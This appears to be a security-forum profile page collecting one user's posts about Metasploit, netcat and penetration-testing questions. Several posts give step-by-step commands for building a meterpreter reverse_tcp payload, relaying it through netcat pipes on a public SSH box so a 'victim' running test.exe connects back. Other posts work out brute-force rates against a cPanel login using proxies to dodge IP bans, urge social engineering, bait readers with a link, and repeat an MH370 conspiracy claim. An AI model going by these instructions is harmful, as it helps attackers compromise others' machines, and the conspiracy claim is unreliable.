Jump to content

i8igmac

Dedicated Members
  • Posts

    939
  • Joined

  • Last visited

  • Days Won

    22

Everything posted by i8igmac

  1. it is not uncommon to be scanned! It happens! Would be interested in seeing a tcodump! I wondr if maybe metasploit exploit handler has a zero day floating around Apt-get install tcpick Tcpick -yP -C "port 4444" Your windows machine should not hang on the stage, something is wrong. I would try a reverse meterpreter with out the stager
  2. for discovering a pineapple. what if u sent off a probe for ssid like pineapple-checker and that ssid exist then wouldn't this be a dead give away?
  3. These public encoders will be undetectable for how long? shikata was 100% undetectable for not long. 98% then 95% 90% 80% 50% as virustital showed after only a few months after its release. Why go public with a fantastic tool like shikata? Or even the tool posted above...
  4. this maybe dumb question. Did u setup msf multi/handler? Can u try to build a payload with out piping threw the encoder, by default I think shikata is already used by msfpayload. Also post your multi/handler commands try a few payloads.
  5. i8igmac

    Tor

    Lol agreed I have a google crawler for generating a list of working proxy's for use with proxychains... just a example
  6. i8igmac

    Tor

    So wrong, not all minds can grasp this stuff... just a example...Lets say u want to brute force a cpannel login, I could explain the ip banning process but Ill skip that... You must sleep for 5 seconds between each login attempt, if you have a list of 100 proxy's you can now achieve how many password attempts per minute ? If it took 20,000 attempts for a success how long will it take? How long would it take with out tor? How easy was this attack? one ip address would take 1,666 minutes 100 ip address would take 16 minutes Is my math wrong? Lol
  7. I would start with nmap. follow some irongeek nmap tutorials. Discover the devices on your network. find open ports on these devices and how to use the service. As cooper said disect each command nmap -h metasploit is also fun and will have u hooked. Install damn vulnerable os iron geek also has some old videos on metasploit
  8. i8igmac

    Tor

    Sure there is a paper trail... would you rob a bank and leave your drivers license on the counter ? Or put on a ski mask... Illegal activity and privacy are 2 separate subjects... I would not use tor with any private information or login credentials
  9. I feel that if application ex-girlfriend.exe is established a connection, should be the first place you look. I would bet ex girlfriend had direct access to this machine...
  10. Is this your private network? Are u on windows? Do u know how to use nmap? If you are on windows you should restart your computer and then run in cmd 'netstat -nb' this will print out applications established connections... always monitor your applications out going traffic... post the output here plz... run the command every few minuts... I'm sure if someone is spying on u. We can find it... Or did I miss understand your post? Edit; The chunck of data base64: can be decoded paste that chunk into a online decodér Check google 'online base64 decoder'
  11. 20 Freescale employees, among 239 people on flight MH370, were engineers working on radio frequency products for applications in avionics, radar, missile guidance, electronic warfare and identification friend or foe technologys... 4 days after the flight disappeared, semiconductor patent was approved by the US patent office. The patent was split between 5 people at 20% 4 of those people disappeared with the flight... Rothschild inherits 100% of semiconductor patent... I'm board and wonder how radars work and then how would you trick the radar in think you don't exist
  12. run pyrit benchmark after installing proper drivers. You have a mobile gpu cracker... learn some pyrit wpa cracking... my geforce 560m can do 14000 passwords per second And once precomputed like 2 million psk sql injection is what's hot... learn it... learn the scanners and manual attacks... Perl python ruby... pick one and do some basic socket application
  13. Netstat -np scrole to the top of this output and u will see applications established ip's I don't know anything about this chat application but I'm sure you are not directly connected to the other client. So, it you most likely need to send a link u hope they click on... And once u do have there ip I'm sure a simple nmap scan will show all filtered ports. so you may need some social Engineering. exploit the user is better quicker results
  14. Rm -R tab complete was also the mistake I made that deleted a hole project/ folder... years of work safely recovered... Testdrive I believe was the tool I posted for my recovering
  15. Ok, im at my machine, this should work... kali_local-ip=192.168.70.103 ssh-box_ip=66.66.66.66 #public-ip port 666 and 555 need to be farword on your ssh-box ssh-box mkfifo ssh-box nc -l -p 555 0<ssh-box | nc -l -p 666 1>ssh-box kali from kali, generate payload and set up handler... transfer your payload to the victim... start some nc pipes msfpayload windows/meterpreter/reverse_tcp LHOST=[ssh-box_ip] LPORT=666 X > test.exe msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=[kali_local-ip] lport=444 E #new terminal mkfifo kali nc [kali_local-ip] 444 0<kali | nc [ssh-box_ip] 555 1>kali Now victim execute test.exe will connect back to ssh on port 666
  16. so. If this makes sense... what remember doing... on a droid at the moment... To bypass the problem u experience with metasploit. I had to setup a proxy on the kali localhost that you would set LHOST/PORT to your multi/handler to localhost Kali Msfpayload reverse/payload set LPORT=1234 LHOST=ssh-box -x test.exe Use multihandler Set LHOST localhost Set LPORT 4444 now start a netcat proxy with mkfifo to pass the payload to your ssh-box(impropersyntax) Nc -l -p 4444 0< pipe | nc ssh-box 5555 1> pipe Exploit Now your ssh-box needs to accept this and pass it to the victim, notice 2 ports need forward Ssh-box Nc -l -p 5555 0< pipe | nc -l -p 1234 1> pipe Now your victem executes the exe that connects back to ssh-box:1234... its a brain twister of ports and pipes. Wish i was at my puter for a proper example.
  17. I may have came across this. I was successful in getting a reverse shell threw a tunnel. Video above I accomplished exactly what you are trying to do.. BUT I tunneled the traffic threw my android phone. I had to explore other types of tunnels, made my own tunnel out of ruby sockets in this video but I found netcat is simplest! Try something generic reverse shell... no staging or anything
  18. also, the link u provide there is a update at the bottem of the page. A netcat example like the one I provide... If your machines are talking to each other then it may just be a metasploit issue
  19. try another payload. Without the stage. there are 3 machines involved with your project? Kali--->SSH-BOX<---victim? ? Your ssh-box is the only machine that can port forward? I suggest running small test. With netcat you can perform hi world examples Also. The link u provide, scrole down and u will see a netcat example like mine...
  20. $ mkfifo mypipe $ nc -l 8082 0<mypipe | nc yahoo:com 80 1>mypipe Your netcat syntax may be different. Here is what mine looks like nc - l -p 8082 this is a basic proxy. Now from another terminal connect to this port 8082 and paste in a proper yahoo get request. If this is simple enough we can move on to a reverse_proxy
  21. do u have access to netcat? Ruby python perl ? u should check out mkfifo pips I can help with answer to my above question
  22. did u have to boot up from live disk? For those that want to recover deleted files shut down the machine right Away! a really nice tool I have used a few weeks ago, testdrive Just open the location of the file you want to recover and you will see highlights in red.
  23. I love to see people use IE... here, dont click this link www.I8igmac.tk
  24. I like cuda gpu cracking... so I went nvidia with cuda support... I would look for a 6 core amd cpu... I spent 250 us dollars two years ago... you could find one around 100 I also paid for 60 gig ssd 2 years ago and now the price has gone way down... You will love this setup
×
×
  • Create New...